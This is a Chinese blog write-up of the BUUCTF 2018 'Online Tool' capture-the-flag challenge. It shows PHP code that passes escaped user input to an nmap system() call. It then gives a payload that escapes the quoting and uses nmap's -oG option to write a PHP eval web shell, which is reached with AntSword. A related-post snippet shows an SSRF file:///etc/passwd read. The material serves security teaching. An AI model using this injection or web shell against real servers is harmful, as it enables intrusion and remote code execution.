[BUUCTF 2018]Online Tool

最新推荐文章于 2024-06-08 16:46:58 发布
最新推荐文章于 2024-06-08 16:46:58 发布
阅读量418 收藏 1
点赞数 1
分类专栏: 题目wp 文章标签: php web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62092622/article/details/124177694
版权

打开是源码

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    //escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数
    $host = escapeshellarg($host);
    //escapeshellcmd — shell 元字符转义
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    //创建一个文件夹(make dir)
    @mkdir($sandbox);
    //切换目录(change dir)
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

通过源码得知,我们需要GET传入host

escapeshellarg 作用是将所有单引号进行转义,并在外面再加一对单引号

eacapeshellcmd 作用是对单引号转义,但对成对的引号不做处理

由于我本地对这两个函数运行不起作用,所以更多的有关这两个函数的内容请参考

谈谈escapeshellarg参数绕过和注入的问题

然后就是最后一行的nmap -T5 -sT -Pn --host-timeout 2 -F

nmap是一个网络扫描工具,使用方法可参考下面两篇

Nmap的使用方法总结_MX-LQ的博客-CSDN博客_nmap使用方法

nmap 基本使用_wdcxccsdn的博客-CSDN博客

 不过nmap的-oG命令可以写入文件,这就让我们想到一句话木马,所以host传参

?host='<?php eval($_POST["hhh"]);?> -oG 1.php '

然后会得到文件夹的位置

然后蚁剑连接

http://3549499c-cce3-4daa-b248-c426fbf02de1.node4.buuoj.cn:81/3a09443d4366b765d31e4c6b3869cf8d/1.php

 得到flag

-眼里有星河-
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF Web [网鼎杯 2018]Fakebook1 & [BUUCTF 2018]Online Tool1
网安小趴菜
09-14 439
BUUCTF Web [网鼎杯 2018]Fakebook1 & [BUUCTF 2018]Online Tool1
[BUUCTF 2018]Online Tool 1
weixin_46196627的博客
06-15 2142
[BUUCTF 2018]Online Tool1查看代码,题目本意是用户输入ip地址,执行nmap扫描 $_SERVER 可以获取服务器和执行环境信息 HTTP_X_FORWARDED_FOR HTTP扩展头部,用来表示http请求端真实ip REMOTE_ADDR代表客户端的IP,但它的值不是由客户端提供的,而是服务端根据客户端的ip指定的,当你的浏览器访问某个网站时,假设中间没有任何代理,那么网站的web服务器(Nginx,Apache等)就会把remote_addr设为你的机器IP,如果你用了某个代
[BUUCTF 2018]Online Tool1
最新发布
m0_73673698的博客
06-08 603
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。接下来是通过get方法传入host参数,经过escapeshellarg和escapeshellcmd两个函数过滤后,拼接到nmap命令后,通过system系统命令来执行命令。发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件这个命令就是我们的输入可控!通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转义…
buuctf online_tool
weixin_43952190的博客
04-29 698
online_tool 进去后得到以上页面,其中设置X-Forwarded-For或者不设置不影响题目,它只是设置命名,$sandbox为目录名。 代码实现的功能就是在线进行namp扫描,通过get一个host主域名进行扫描。 对上面出现的nmap命令进行了解: -T5 : 可以加快或者减慢扫描速度,有六个级别,级别越高速度越快,也越容易被WAF或者IDS发现。 -sT:使用TCP Syn...
Seal Online Tool_tool_ToolsItem.scr_
10-02
《Seal Online Tool_tool_ToolsItem.scr》是一款专门针对网络游戏《封印传说》(Seal Online)的离线编辑工具。它主要用于编辑游戏中的物品脚本( SCR 文件),允许玩家在不连接到游戏服务器的情况下对游戏内的道具...
sqlTool.rar_Online SQL Tool_SQLTool_sqlto
09-24
标题中的"sqlTool.rar_Online SQL Tool_SQLTool_sqlto"提到了一个名为"SQLTool"的在线SQL处理工具。这个工具允许用户通过网络界面执行SQL语句,进行数据库的查询、更新、插入和删除等操作,无需在本地安装任何特定的...
Online-Compile
01-30
Online_Compile
online_classroom.csv
03-17
CSDN因果分析系列相关数据
qt-unified-windows-x86-online.exe
07-14
"qt-unified-windows-x86-online.exe" 是一个用于Windows 32位系统的QT在线安装程序,它提供了方便的方式来下载和安装QT开发环境。 这个安装程序的核心功能包括: 1. **集成安装器**:qt-unified-windows-x86-on...
buuctfOnline tool 命令执行&RCE&nmap
qq_37301470的博客
11-21 3144
Online tool 被自己蠢到了,一句话上传成功后没看见沙盒地址,一直蚁剑连接失败。。。 有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_
关于buu上的namp两道题
m0_55185160的博客
03-28 1933
关于buu上的namp两道题 这个是题目的源码 源码中只要用到了escapeshellarg()函数和escapeshellcmd()函数,经过搜索这两个函数我们来了解这两个函数: 看这些概念没看太懂,那么我们来实际测试一下,更容易理解些 经过 escapeshellarg 函数处理过的参数被拼凑成 shell 命令,并且被双引号包裹这样就会造成漏洞,这主要在于bash中双引号和单引号解析变量是有区别的。 在解析单引号的时候 , 被单引号包裹的内容中如果有变量 , 这.
BUUCTF-Online Tool
m0_47571887的博客
11-10 691
这道题真的挺不常见的,考的点也有点不常见 打开题目 一段代码这里就有两个不常见的函数escapeshellarg()和escapeshellcmd(),PHP escapeshellarg()+escapeshellcmd() 之殇 给大家放个链接来理解 大概来说就是这两个函数对我们传入的数值进行单引号转义,会加上/符号,那这时候就只能往后看看能不能利用namp做点文章。 在nmap中有一个参数-oG,就是将命令和结果都写入到文件,到这里我们就可以想到上传一句话,然后写入到php文件里
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3860
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
ssrf漏洞 CTF
zb0567的专栏
04-21 1796
扫描 /index.php /robots.txt User-agent: * Disallow: /webshe11231231231.php http://*:8016/index.php?url=www.baidu.com http://*:8016/index.php?url=file:///etc/passwd 读取文件 http://*:8016/index.php?u...
ArcGIS Online:企业级云GIS平台与应用
"本文主要介绍了ArcGIS Online,这是一个由Esri公司提供的公有云GIS平台,用于构建企业级GIS应用。文章涵盖了ArcGIS Online的基本架构、功能特性、新功能以及其在组织内部资源共享和协同工作中的作用。同时,讨论了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值